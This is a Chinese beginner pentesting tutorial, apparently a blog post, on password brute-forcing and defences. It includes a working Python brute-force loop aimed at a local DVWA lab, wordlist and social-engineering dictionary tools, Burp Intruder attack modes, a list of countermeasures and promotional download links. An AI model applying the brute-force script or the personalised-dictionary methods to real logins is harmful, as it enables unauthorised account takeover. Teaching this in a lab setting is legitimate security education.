前言
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段暴力猜解与防御第3篇。
本文主要讲解密码猜解思路
喜欢的朋友们,记得给大白点赞支持和收藏一下,关注我,学习黑客技术。

密码猜解思路:
1:密码长度
2:密码内容,数字,大小写,符号
3:字典——kali(cd /usr/share/worrlists 目录下)——
[GitHub - TgeaUs/Weak-password: 字典大全 dictionary](https://github.com/TgeaUs/Weak-password " GitHub - TgeaUs/Weak-password: 字典大全 dictionary")
[GitHub - CrackerCat/SuperWordlist: 基于实战沉淀下的各种弱口令字典](https://github.com/CrackerCat/SuperWordlist " GitHub - CrackerCat/SuperWordlist: 基于实战沉淀下的各种弱口令字典")
字典的使用要注重:将多个字典去重结合成自己的字典——长期维护属于自己的字典——注意场合,不同的场合使用不同的字典。
生成字典:crunch -h kali自带,可以生成指定字典,
社工字典:cupp(kal自带,针对外国人),ccupp(针对中国人),输入姓名,手机号,QQ号,出生日期,等等信息生成一个密码库,一般此方法成功率较高。
4:python暴力破解
思路:读取字典生成密码——http连接爆破地址——发起请求——获取响应——查看错误提示——根据提示判断是否进入下一次循环——直到爆破成功。
pwds = open("password.txt")
for pwd in pwds:
print(pwd)
import requests
# 如果第一个密码就提示成功,是 PHPSESSID 没有替换的问题
pwds = open("password.txt")
for pwd in pwds:
url = "http://localhost/dvwa/vulnerabilities/brute/"#在暴力破解关卡F12出来的
# PHPSESSID务必替换为登录以后的PHPSESSID
resp = requests.get(url = url, params = {"username":"admin", "password":pwd.strip(), "Login":"Login"}, headers = {"Cookie":"security=low; PHPSESSID=himu84h1ia6vsvklt76c9juhqd"})
#print(resp.text) cookie也得是当前页面的,因为是已经登录进来,所以要输入cookie值
if 'Username and/or password incorrect.' in resp.text:
print('破解失败:'+pwd, end='')
else:
print('破解成功:'+pwd, end='')
break;
pwds.close()
5:Burp Suite暴力破解
intruder 攻击模式
Sniper 默认,适用于已知用户名,密码未知的情况
Battering ram 适用于时间窗口短, A用户配对A密码,排序验证
Pitchfork 适用于一次性向多个目标发起攻击的情况 交叉验证
Cluster bomb 适用于多个参数的爆破,可以同时对多个参数进行猜解,每个参数猜解的字典可以不同,最终将每个参数猜解出来的结果进行组合生成一组完整的请求。交叉验证
密码暴力破解的防御
限时——sleep(2),每隔2秒再响应
限次数——这个基本通过爆破的方式基本无解
token——串行访问——BP里可以加个token值
验证——数字——二次验证——IP验证——滑动——识别图像——短信
WAF
定期强制修改密码
取消密码登录——靠微信,手机验证码等
个人安全建议:
使用复杂密码:
不要统一密码
定期修改密码
防止钓鱼——(不明链接,邮箱,文件别乱点)
其他工具:
wfuzz:
Hydra:
Medusa:
msfconsole:
为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
[2024最新优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
[2024最新优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取



被折叠的 条评论
为什么被折叠?



